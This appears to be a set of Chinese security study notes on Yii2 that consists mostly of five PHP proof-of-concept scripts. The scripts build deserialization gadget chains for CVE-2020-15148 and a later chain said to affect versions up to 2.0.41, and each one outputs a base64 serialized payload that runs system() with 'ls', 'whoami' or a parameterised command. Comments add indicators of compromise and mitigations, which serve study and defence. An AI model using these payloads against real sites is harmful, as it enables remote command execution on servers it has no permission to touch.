yii学习
yii2
CVE-2020-15148
影响 yii2 2.0.37 及更低版本
poc1-3 可参考此文章：https://juejin.cn/post/6874149010832097294
poc1(CVE-2020-15148)
利用 `[(new test), "aaa"]` 这种数组形式的可调用值，
来调用任意 test 类的 aaa 方法，从而绕过了 call_user_func 参数不可控的限制。
<?php
// poc1 for CVE-2020-15148: builds an object graph out of three gadget
// classes and prints it as a base64-encoded serialize() string. The script
// itself executes nothing; the effect only occurs when a vulnerable
// application passes this string to unserialize().
// Defender's note: serialized data from an untrusted source that contains
// the class names yii\db\BatchQueryResult, Faker\Generator or
// yii\rest\CreateAction is the indicator to alert on. The mitigation is to
// never unserialize() untrusted input (use json_decode instead) and to
// upgrade beyond the affected version named above.
namespace yii\rest {
    // Local stand-in for the framework class of the same name: only the two
    // properties the chain relies on are declared, so serialize() emits them.
    class CreateAction
    {
        public $checkAccess;
        public $id;

        public function __construct()
        {
            // 'system' is the callable name and 'ls' its argument; the real
            // CreateAction::run presumably invokes $checkAccess with $id (the
            // framework code is not shown on this page -- see the linked
            // write-up).
            $this->checkAccess = 'system';
            $this->id = 'ls';
        }
    }
}

namespace Faker {
    use yii\rest\CreateAction;

    class Generator
    {
        protected $formatters;

        public function __construct()
        {
            // Array-form callable [object, 'run'] registered under the key
            // 'close'; this is the "[(new test), \"aaa\"]" trick described
            // above -- a call to close() on the real Generator presumably
            // dispatches to CreateAction::run through this table.
            $this->formatters['close'] = [new CreateAction(), 'run'];
        }
    }
}

namespace yii\db {
    use Faker\Generator;

    class BatchQueryResult
    {
        private $_dataReader;

        public function __construct()
        {
            // Outermost object of the chain. The real class presumably calls
            // close() on $_dataReader during cleanup after unserialize(),
            // which is what reaches Generator above (not shown here).
            $this->_dataReader = new Generator;
        }
    }
}

namespace {
    // Emit the payload; base64 only makes it safe to copy, it is not
    // obfuscation.
    echo base64_encode(serialize(new yii\db\BatchQueryResult));
}
?>
poc2
<?php
// poc2: same CreateAction/Generator gadgets as poc1, but the chain is
// entered through Codeception\Extension\RunProcess instead of
// yii\db\BatchQueryResult, and the Generator key is 'isRunning' instead of
// 'close'. Only the serialized string is produced here.
// Defender's note: the indicator is serialized input naming
// Codeception\Extension\RunProcess together with Faker\Generator; the fix is
// the same -- do not unserialize() untrusted data, and upgrade.
namespace yii\rest {
    // Minimal stand-in for the framework class; see poc1 for the role of
    // the two properties.
    class CreateAction
    {
        public $checkAccess;
        public $id;

        public function __construct()
        {
            $this->checkAccess = 'system';
            $this->id = 'ls';
        }
    }
}

namespace Faker {
    use yii\rest\CreateAction;

    class Generator
    {
        protected $formatters;

        public function __construct()
        {
            // Array callable registered under 'isRunning', presumably the
            // method name RunProcess ends up calling on each process object.
            $this->formatters['isRunning'] = [new CreateAction(), 'run'];
        }
    }
}

namespace Codeception\Extension {
    use Faker\Generator;

    class RunProcess
    {
        private $processes;

        public function __construct()
        {
            // A Generator is placed where RunProcess expects a process
            // object; the real RunProcess's cleanup is the presumed entry
            // point of the chain (framework code not shown on this page).
            $this->processes = [new Generator()];
        }
    }
}

namespace {
    // generate the poc
    // NOTE: in the collapsed listing above this comment and the echo shared
    // one line, which would have commented the echo out; they are separate
    // statements here.
    echo base64_encode(serialize(new Codeception\Extension\RunProcess()));
}
?>
poc3
<?php
// poc3: same CreateAction/Generator gadgets as poc1 (key 'render' this
// time), reached through two further classes from other vendored
// libraries: phpDocumentor\Reflection\DocBlock\Tags\See and the global
// Swift_KeyCache_DiskKeyCache. Only the serialized string is produced.
// Defender's note: this shows that the reachable gadget set depends on
// every library in vendor/, not just the framework -- an unserialize() of
// untrusted input is unsafe regardless of which classes the application
// itself defines.
namespace yii\rest {
    // Minimal stand-in for the framework class; see poc1 for the role of
    // the two properties.
    class CreateAction
    {
        public $checkAccess;
        public $id;

        public function __construct()
        {
            $this->checkAccess = 'system';
            $this->id = 'ls';
        }
    }
}

namespace Faker {
    use yii\rest\CreateAction;

    class Generator
    {
        protected $formatters;

        public function __construct()
        {
            // Array callable registered under 'render', presumably the
            // method the See tag calls on its description object.
            $this->formatters['render'] = [new CreateAction(), 'run'];
        }
    }
}

namespace phpDocumentor\Reflection\DocBlock\Tags {
    use Faker\Generator;

    class See
    {
        protected $description;

        public function __construct()
        {
            // The Generator is placed where a description object is expected.
            $this->description = new Generator();
        }
    }
}

namespace {
    use phpDocumentor\Reflection\DocBlock\Tags\See;

    class Swift_KeyCache_DiskKeyCache
    {
        private $keys = [];
        private $path;

        public function __construct()
        {
            // $path is used as a string by the real class (presumably), so
            // the See object placed here gets converted/rendered; $keys only
            // needs to be non-empty so that the real class's cleanup loop has
            // something to iterate over (values are arbitrary).
            $this->path = new See;
            $this->keys = array( "axin"=>array("is"=>"handsome") );
        }
    }

    echo base64_encode(serialize(new Swift_KeyCache_DiskKeyCache()));
}
?>
poc4
<?php
// poc4: a variant that stays entirely inside the framework's own namespaces
// (yii\rest\IndexAction, yii\web\DbSession, yii\db\BatchQueryResult) --
// no third-party gadget classes are needed. Only the serialized string is
// produced; the command is 'whoami' instead of 'ls'.
// Defender's note: because every class here ships with the framework, an
// allow-list of application classes on unserialize() does not help; the
// only robust fix is to not unserialize() untrusted data and to upgrade.
namespace yii\rest {
    // Minimal stand-in for the framework class; the real IndexAction::run
    // presumably invokes $checkAccess with $id as argument (not shown here).
    class IndexAction
    {
        public $checkAccess;
        public $id;

        public function __construct()
        {
            $this->checkAccess="system";
            $this->id="whoami";
        }
    }
}

namespace yii\web {
    use yii\rest\IndexAction;

    class DbSession
    {
        protected $fields = [];
        public $writeCallback;

        public function __construct()
        {
            // Array-form callable pointing at IndexAction::run; $fields is
            // given one dummy entry, presumably so that the real DbSession's
            // write path treats the callback as worth invoking.
            $this->writeCallback=[(new IndexAction),"run"];
            $this->fields['1'] = 'aaa';
        }
    }
}

namespace yii\db {
    use yii\web\DbSession;

    class BatchQueryResult
    {
        private $_dataReader;

        public function __construct()
        {
            // Same outer gadget as poc1, with DbSession as the reader.
            $this->_dataReader=new DbSession();
        }
    }
}

namespace {
    // print() returns 1, so $exp only holds that flag and is otherwise
    // unused; the payload goes to stdout.
    $exp=print(base64_encode(serialize(new yii\db\BatchQueryResult())));
}
?>
other poc
可参考此文章：https://www.anquanke.com/post/id/217929
新POP链
yii2 version <= 2.0.41（截至写作时 GitHub 最新版本）
https://xz.aliyun.com/t/9420
<?php
// Newer chain (the text above states it still applies up to yii2 2.0.41):
// the Faker\Generator gadget is replaced by Faker\ValidGenerator wrapping a
// Faker\DefaultGenerator, again entered through
// Codeception\Extension\RunProcess. The callable name and its argument are
// taken from the constructor parameters, so this script is parameterised
// rather than hard-coding 'system'/'ls'. Only the serialized string is
// produced.
// Defender's note: the serialized class names Faker\ValidGenerator and
// Faker\DefaultGenerator arriving from an untrusted source are the
// indicator; the mitigation is unchanged -- no unserialize() of untrusted
// data, and upgrade.
namespace Faker {
    class DefaultGenerator
    {
        protected $default ;

        // $argv: the value the generator always returns (presumably), i.e.
        // the argument that will be handed to the callable.
        function __construct($argv)
        {
            $this->default = $argv;
        }
    }

    class ValidGenerator
    {
        protected $generator;
        protected $validator;
        protected $maxRetries;

        // $command: stored as $validator, presumably invoked as a callable
        // on each generated value by the real ValidGenerator (not shown).
        // $argv: forwarded to DefaultGenerator.
        function __construct($command,$argv)
        {
            $this->generator = new DefaultGenerator($argv);
            $this->validator = $command;
            // Large retry budget; its exact role in the real class is not
            // visible here -- presumably it keeps the validator loop alive
            // long enough for the call to happen.
            $this->maxRetries = 99999999;
        }
    }
}

namespace Codeception\Extension {
    use Faker\ValidGenerator;

    class RunProcess
    {
        private $processes = [] ;

        function __construct($command,$argv)
        {
            // ValidGenerator placed where a process object is expected; see
            // poc2 for the same entry-point pattern.
            $this->processes[] = new ValidGenerator($command,$argv);
        }
    }
}

namespace {
    use Codeception\Extension\RunProcess;

    $exp = new RunProcess('system','whoami');
    echo(base64_encode(serialize($exp)));
    exit();
}
Yii2 SQL 注入分析
影响版本：小于 v2.0.15
https://juejin.cn/post/6874149010832097294
https://www.anquanke.com/post/id/217929